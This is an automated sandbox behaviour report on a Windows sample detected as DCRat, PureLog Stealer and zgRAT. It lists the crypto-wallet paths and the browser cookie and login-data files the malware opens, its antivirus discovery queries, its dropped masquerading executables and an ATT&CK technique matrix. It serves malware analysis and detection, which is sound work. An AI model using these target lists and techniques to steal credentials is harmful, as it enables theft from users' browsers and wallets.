                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\ProgramData\fontdrvhost.exeQueries volume information: C:\ProgramData\fontdrvhost.exe VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\ProgramData\fontdrvhost.exeQueries volume information: C:\ProgramData\fontdrvhost.exe VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\ProgramData\fontdrvhost.exeQueries volume information: C:\ProgramData\fontdrvhost.exe VolumeInformation
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeQueries volume information: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeQueries volume information: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe VolumeInformation
                                Source: C:\ProgramData\fontdrvhost.exeQueries volume information: C:\ProgramData\fontdrvhost.exe VolumeInformation
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeQueries volume information: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe VolumeInformation
                                Source: C:\ProgramData\fontdrvhost.exeQueries volume information: C:\ProgramData\fontdrvhost.exe VolumeInformation
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeQueries volume information: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe VolumeInformation
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.2983468368.000001907A61A000.00000004.00000020.00020000.00000000.sdmp, Wh2c6sgwRo.exe, 00000000.00000002.3007715987.000001907AAD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                Stealing of Sensitive Information

                                barindex
                                Yara detected DCRat
                                Source: Yara matchFile source: 2.0.d3yngi1q.wji.exe.cf0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000002.00000000.1547271116.0000000000CF2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: d3yngi1q.wji.exe PID: 7768, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\fontdrvhost.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, type: DROPPED
                                Yara detected PureLog Stealer
                                Source: Yara matchFile source: Wh2c6sgwRo.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.1418594888.000001905FF02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                Yara detected zgRAT
                                Source: Yara matchFile source: Wh2c6sgwRo.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpack, type: UNPACKEDPE
                                Found many strings related to Crypto-Wallets (likely being stolen)
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets0Local Extension Settings
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
                                Tries to harvest and steal browser information (history, passwords, etc)
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                                Source: Yara matchFile source: 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Wh2c6sgwRo.exe PID: 7520, type: MEMORYSTR

                                Remote Access Functionality

                                barindex
                                Yara detected DCRat
                                Source: Yara matchFile source: 2.0.d3yngi1q.wji.exe.cf0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000002.00000000.1547271116.0000000000CF2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: d3yngi1q.wji.exe PID: 7768, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\fontdrvhost.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe, type: DROPPED
                                Yara detected PureLog Stealer
                                Source: Yara matchFile source: Wh2c6sgwRo.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.1418594888.000001905FF02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                Yara detected zgRAT
                                Source: Yara matchFile source: Wh2c6sgwRo.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Wh2c6sgwRo.exe.1905ff00000.0.unpack, type: UNPACKEDPE

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information1
                                Scripting                                		Valid Accounts241
                                Windows Management Instrumentation                                		1
                                Scripting                                		1
                                DLL Side-Loading                                		11
                                Disable or Modify Tools                                		1
                                OS Credential Dumping                                		2
                                File and Directory Discovery                                		1
                                Taint Shared Content                                		11
                                Archive Collected Data                                		1
                                Ingress Tool Transfer                                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault AccountsScheduled Task/Job1
                                DLL Side-Loading                                		11
                                Process Injection                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory154
                                System Information Discovery                                		Remote Desktop Protocol2
                                Data from Local System                                		11
                                Encrypted Channel                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain AccountsAt31
                                Registry Run Keys / Startup Folder                                		31
                                Registry Run Keys / Startup Folder                                		1
                                Obfuscated Files or Information                                		Security Account Manager661
                                Security Software Discovery                                		SMB/Windows Admin Shares1
                                Clipboard Data                                		1
                                Non-Standard Port                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                                Software Packing                                		NTDS1
                                Process Discovery                                		Distributed Component Object ModelInput Capture3
                                Non-Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                Timestomp                                		LSA Secrets271
                                Virtualization/Sandbox Evasion                                		SSHKeylogging14
                                Application Layer Protocol                                		Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                DLL Side-Loading                                		Cached Domain Credentials1
                                Application Window Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                                File Deletion                                		DCSync1
                                Remote System Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                                Masquerading                                		Proc Filesystem11
                                System Network Configuration Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt271
                                Virtualization/Sandbox Evasion                                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                                Process Injection                                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
